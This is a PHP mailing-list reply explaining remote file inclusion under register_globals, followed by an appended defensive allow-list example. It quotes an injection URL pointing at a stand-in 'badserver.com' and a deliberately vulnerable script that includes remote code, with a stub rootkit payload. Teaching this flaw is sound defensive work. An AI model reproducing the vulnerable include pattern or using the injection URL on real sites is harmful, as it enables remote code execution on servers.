tedd wrote:
> At 1:39 PM -0500 11/14/06, Chris Shiflett wrote:
>> tedd wrote:
>>> > The script will then include
>>> > http://www.badserver.com/badscript.txt?dummy=script.php
>>>
>>> I still don't see how "badscript.php" can be uploaded into
>>> example.com's site in the first place
>>
>> PHP sends a request to badserver.com for badscript.txt, and the content
>> of the response is included just as if it were the content of a local
>> file.
>>
>> Hope that helps.
>>
>> Chris
>
> Chris;
>
> I'm still confused.
>
>> At 7:12 PM +0100 11/13/06, Rory Browne wrote:
>>
>> If register_globals is enabled, someone could
>> http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy=
>>
>
> If example.com is my domain, then how could evil-doer get access to my
> site to place "badscript.php" there?

in this hypothetical situation you're a complete moron and you wrote this
script:

    <?
    // let's install their rootkit for them,
    // save them having to do it.
    if (!isset($path))
        $path = 'http://www.badserver.com/badscript.txt?dummy=';

    include $path;
    ?>

and bad script contains:

    <?php
    function loadRootKit() { /* go */ }
    loadRootKit();
    ?>

of course, in real life you're not that stupid at all - but subtler versions
of such vulns occur all over the place :-/

anyway Chris's site(s) have lots of info on this subject - I recommend
reading till something sticks (at least that's my tactic :-)

>
> tedd
>

--
PHP General Mailing List (http://www.php.net/)
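For contrast with the script in the message above, here is an added example (not part of the thread and not any poster's code) of the usual fix: the request value is only ever used as a key into a fixed list of local files, so neither register_globals nor a crafted ?path= can steer include to a remote URL. The function name resolve_include(), the $ALLOWED_PAGES list and the temporary directory are assumptions made for the example.

```php
<?php
// Added example, not code from the thread. resolve_include(), $ALLOWED_PAGES
// and the temporary pages directory are hypothetical names.

// Constructed allow-list: request key => file shipped with the application.
$ALLOWED_PAGES = ['home' => 'home.php', 'contact' => 'contact.php'];

// Map an untrusted request value to a local file path, or return null.
// The value is used only as an array key, never as a path or URL.
function resolve_include($key, array $allowed, string $baseDir): ?string
{
    if (!is_string($key) || !array_key_exists($key, $allowed)) {
        return null; // unknown key, remote URL, traversal string, array...
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $allowed[$key]);
    // realpath() is false for a missing file; the prefix check keeps the
    // resolved path inside $baseDir even if the list is later misedited.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($base === false || $path === false
        || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Self-check with constructed inputs when run from the command line.
if (PHP_SAPI === 'cli') {
    $dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . getmypid();
    mkdir($dir);
    file_put_contents($dir . DIRECTORY_SEPARATOR . 'home.php', "<?php echo 'home';\n");

    $inputs = [
        'home',                                          // accepted
        'contact',                                       // listed, file missing
        'http://www.badserver.com/badscript.txt?dummy=', // URL from the thread
        '../../etc/passwd',                              // traversal attempt
        ['home'],                                        // ?path[]=home
    ];
    foreach ($inputs as $in) {
        $resolved = resolve_include($in, $ALLOWED_PAGES, $dir);
        printf("%-52s => %s\n", json_encode($in, JSON_UNESCAPED_SLASHES),
            $resolved ?? 'rejected');
    }
    unlink($dir . DIRECTORY_SEPARATOR . 'home.php');
    rmdir($dir);
}
```

Independently of the allow-list, setting allow_url_include = Off in php.ini stops include from fetching http:// URLs at all.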